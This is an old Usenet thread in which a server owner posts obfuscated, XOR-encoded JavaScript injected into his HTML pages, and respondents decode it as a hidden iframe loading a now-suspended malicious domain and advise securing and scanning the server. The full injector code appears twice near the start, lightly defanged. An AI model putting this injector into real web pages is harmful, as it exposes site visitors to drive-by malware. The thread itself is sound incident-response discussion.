<div id="testws35fdgh"></div>
<script language="ALPHA">
var0 = "\x69\x3c\x33\x27\x34\x38\x30\x75\x3b\x34"; var1 =
"\x38\x30\x68\x72\x36\x3a\x20\x3b\x21\x30"; var2 =
"\x27\x72\x75\x26\x27\x36\x68\x72\x3d\x21"; var3 = "\x21\x25\x6f\x7a
\x7a\x33\x27\x34\x38\x30"; var4 = "\x26\x21\x34\x21\x7b\x3b\x30\x21\x7a
\x3c"; var5 = "\x3b\x31\x30\x2d\x67\x7b\x25\x3d\x25\x72"; var6 =
"\x75\x3d\x30\x3c\x32\x3d\x21\x68\x72\x64"; var7 =
"\x63\x72\x75\x22\x3c\x31\x21\x3d\x68\x72"; var8 =
"\x64\x63\x72\x75\x33\x27\x34\x38\x30\x37"; var9 = "\x3a
\x27\x31\x30\x27\x68\x72\x65\x72\x75"; var10 = "\x26\x36\x27\x3a
\x39\x39\x3c\x3b\x32\x68"; var11 = "\x72\x3b\x3a\x72\x6b\x69\x7a\x3c
\x33\x27"; var12 = "\x34\x38\x30\x6b";
sr =
var0+var1+var2+var3+var4+var5+var6+var7+var8+var9+var10+var11+var12;
dst = "";
for(i = 0; i < sr.length; i++) {
var d = parseInt(sr.charCodeAt(i) ^ 85);
dst = dst + String.fromCharCode(d);
}
document.getElementById("testws35fdgh").innerHTML = dst;
</script> <div id="testws35fdgh"></div>
<script language="ALPHA">
var0 = "\x69\x3c\x33\x27\x34\x38\x30\x75\x3b\x34"; var1 =
"\x38\x30\x68\x72\x36\x3a\x20\x3b\x21\x30"; var2 =
"\x27\x72\x75\x26\x27\x36\x68\x72\x3d\x21"; var3 = "\x21\x25\x6f\x7a
\x7a\x33\x27\x34\x38\x30"; var4 = "\x26\x21\x34\x21\x7b\x3b\x30\x21\x7a
\x3c"; var5 = "\x3b\x31\x30\x2d\x67\x7b\x25\x3d\x25\x72"; var6 =
"\x75\x3d\x30\x3c\x32\x3d\x21\x68\x72\x64"; var7 =
"\x63\x72\x75\x22\x3c\x31\x21\x3d\x68\x72"; var8 =
"\x64\x63\x72\x75\x33\x27\x34\x38\x30\x37"; var9 = "\x3a
\x27\x31\x30\x27\x68\x72\x65\x72\x75"; var10 = "\x26\x36\x27\x3a
\x39\x39\x3c\x3b\x32\x68"; var11 = "\x72\x3b\x3a\x72\x6b\x69\x7a\x3c
\x33\x27"; var12 = "\x34\x38\x30\x6b";
sr =
var0+var1+var2+var3+var4+var5+var6+var7+var8+var9+var10+var11+var12;
dst = "";
for(i = 0; i < sr.length; i++) {
var d = parseInt(sr.charCodeAt(i) ^ 85);
dst = dst + String.fromCharCode(d);
}
document.getElementById("testws35fdgh").innerHTML = dst;
</script>
> I just noticed that I have html files on my server that are infected
> with javascript code. What is this? It looks like this (note that
> I've replaced the word "Javascript" with "ALPHA" below, just in in
> case just pasting this code could cause problems...)
Decodes to an Iframe which will try to load what was at
framestat.net/index2.php
Not reachable, as the domain has been suspended. Better check your
users for malware.
Domain Name: FRAMESTAT.NET
Registrar: ONLINENIC, INC.
Whois Server: whois.OnlineNIC.com
Referral URL: http://www.OnlineNIC.com
Name Server: NS1.FALSE.COM
Name Server: NS2.FALSE.COM
Status: ok
Updated Date: 02-mar-2007
Creation Date: 22-feb-2007
Expiration Date: 22-feb-2008
Registrant:
Suspended Domain in...@4host.info +1.00000000
Suspended domain
Suspended domain
Suspended domain,Suspended domain,US 94040
Domain Name:framestat.net
Record last updated at 2007-02-22 14:43:52
Record created on 2007/2/22
Record expired on 2008/2/22
| <garen...@gmail.com> wrote:
|
>> I just noticed that I have html files on my server that are infected
>> with javascript code. What is this? It looks like this (note that
>> I've replaced the word "Javascript" with "ALPHA" below, just in in
>> case just pasting this code could cause problems...)
|
| Decodes to an Iframe which will try to load what was at
| framestat.net/index2.php
|
| Not reachable, as the domain has been suspended. Better check your
| users for malware.
|
< snip >
Thanx Ant!
--
Dave
http://www.claymania.com/removal-trojan-adware.html
http://www.ik-cs.com/got-a-virus.htm
| I just noticed that I have html files on my server that are infected
| with javascript code. What is this? It looks like this (note that
| I've replaced the word "Javascript" with "ALPHA" below, just in in
| case just pasting this code could cause problems...)
|
< snip >
Based upon Ant's decoding of the script I suggest two things.
1. Locking down that server which includes changing passwords and making sure they are
strong, plus making sure all vulnerabilities are corrected and the server is up-to-date
with all patches.
2. Scanning the server. The following can be used to scan the server for malware...
Download MULTI_AV.EXE from the URL --
http://www.ik-cs.com/programs/virtools/Multi_AV.exe
To use this utility, perform the following...
Execute; Multi_AV.exe { Note: You must use the default folder C:\AV-CLS }
Choose; Unzip
Choose; Close
Execute; C:\AV-CLS\StartMenu.BAT
{ or Double-click on 'Start Menu' in C:\AV-CLS }
NOTE: You may have to disable your software FireWall or allow WGET.EXE to go through your
FireWall to allow it to download the needed AV vendor related files.
C:\AV-CLS\StartMenu.BAT -- { or Double-click on 'Start Menu' in C:\AV-CLS}
This will bring up the initial menu of choices and should be executed in Normal Mode.
This way all the components can be downloaded from each AV vendor's web site.
The choices are; Sophos, Trend, McAfee, Kaspersky, Exit this menu and Reboot the PC.
You can choose to go to each menu item and just download the needed files or you can
download the files and perform a scan in Normal Mode. Once you have downloaded the files
needed for each scanner you want to use, you should reboot the PC into Safe Mode [F8 key
during boot] and re-run the menu again and choose which scanner you want to run in Safe
Mode. It is suggested to run the scanners in both Safe Mode and Normal Mode.
When the menu is displayed hitting 'H' or 'h' will bring up a more comprehensive PDF help
file. http://www.ik-cs.com/multi-av.htm
Additional Instructions:
http://pcdid.com/Multi_AV.htm
* * * Please report back your results * * *
On Mar 5, 6:39 pm, "David H. Lipman" <DLipman~nosp...@Verizon.Net>
wrote:
> From: <garen.ev...@gmail.com>
>
> | I just noticed that I have html files on my server that are infected
> | with javascript code. What is this? It looks like this (note that
> | I've replaced the word "Javascript" with "ALPHA" below, just in in
> | case just pasting this code could cause problems...)
> |
>
> < snip >
>
> Based upon Ant's decoding of the script I suggest two things.
>
> 1. Locking down that server which includes changing passwords and making sure they are
> strong, plus making sure all vulnerabilities are corrected and the server is up-to-date
> with all patches.
>
> 2. Scanning the server. The following can be used to scan the server for malware...
>
> Download MULTI_AV.EXE from the URL --http://www.ik-cs.com/programs/virtools/Multi_AV.exe